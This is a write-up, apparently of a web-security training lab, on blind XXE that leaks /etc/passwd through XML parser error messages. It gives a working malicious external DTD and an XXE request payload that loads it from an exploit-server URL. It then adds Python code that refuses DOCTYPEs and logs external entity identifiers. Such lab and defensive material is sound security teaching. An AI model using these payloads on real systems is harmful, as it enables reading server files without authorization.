Exploiting blind XXE to retrieve data via error messages

Exploitation

The lab has a "Check stock" feature that parses XML input.

Send the "Check stock" request to Burp Repeater.

To exploit this, we trigger an XML parsing error whose message contains sensitive data, such as the contents of /etc/passwd.

In the lab, we have an exploit server that lets us host a malicious external DTD.

You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

This DTD carries out the following steps:

  • Define an XML parameter entity called file, containing the contents of the /etc/passwd file.

  • Define an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called error. The error entity will be evaluated by loading a nonexistent file whose name contains the value of the file entity.

  • Use the eval entity, which causes the dynamic declaration of the error entity to be performed.

  • Use the error entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd file.

Now click "View exploit" and copy the URL; we will use it to invoke the DTD.

Next, to make the target server fetch and process our malicious external DTD, send the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a8d00b8044992e788e2f0c501070053.exploit-server.net/malicious.dtd"> %xxe;]>
<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>

This payload will:

  • Define an XML parameter entity called xxe, which fetches our exploit server’s malicious DTD, and reference it with %xxe; so that the DTD is interpreted inline

Now go back to the "Check stock" request we sent to Repeater and replace its body with this XML payload to invoke the malicious DTD hosted on our exploit server.

The error message in the response contains the contents of /etc/passwd, and we have solved the lab.
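For the defensive side of the DTD steps and the payload above, here is an added example (not part of the original walkthrough) of how the stockCheck endpoint could parse that request without ever fetching the DTD: the parser leaves parameter-entity parsing off and refuses any DOCTYPE outright, and a second helper only records the SYSTEM identifier declared in the payload so a gateway can log it. The sample request bodies are constructed from the payload above, reusing the lab's exploit-server URL.

```python
import xml.parsers.expat as expat
# Constructed samples: the lab's stockCheck body with and without the XXE DOCTYPE.
XXE_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
    '"https://exploit-0a8d00b8044992e788e2f0c501070053.exploit-server.net/malicious.dtd"> %xxe;]>'
    '<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>'
)
BENIGN_REQUEST = ('<?xml version="1.0" encoding="UTF-8"?>'
                  '<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>')

class DoctypeRejected(ValueError):
    """A stock check never needs a DOCTYPE, so any DOCTYPE is refused outright."""

def _safe_parser():
    p = expat.ParserCreate()
    # Never parse parameter entities, so an external DTD subset is never fetched;
    # returning 0 from the external-entity hook refuses any other external load.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    return p

def parse_stock_check(body):
    """Return {'productId': ..., 'storeId': ...}, or raise DoctypeRejected."""
    p = _safe_parser()
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' not allowed in stock check")
    p.StartDoctypeDeclHandler = on_doctype  # fires before any entity is declared
    fields, stack = {}, []
    p.StartElementHandler = lambda name, attrs: stack.append(name)
    p.EndElementHandler = lambda name: stack.pop()
    def on_text(data):  # character data may arrive in several chunks
        if stack and stack[-1] in ("productId", "storeId"):
            fields[stack[-1]] = fields.get(stack[-1], "") + data
    p.CharacterDataHandler = on_text
    p.Parse(body, True)
    return fields

def external_entity_ids(body):
    """Detection helper: SYSTEM ids declared in the DOCTYPE, collected without fetching them."""
    p = _safe_parser()
    found = []
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid:
            found.append(("%" + name if is_param else name, sysid))
    p.EntityDeclHandler = on_entity
    try:
        p.Parse(body, True)
    except expat.ExpatError:
        pass  # a malformed or refused DOCTYPE is itself worth reporting
    return found
```

The stdlib expat parser never reads parameter entities unless told to, but refusing the DOCTYPE in the handler makes the policy explicit and independent of parser defaults.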

I hope you found this walkthrough easy to understand and follow.

Greetings from Sayonara
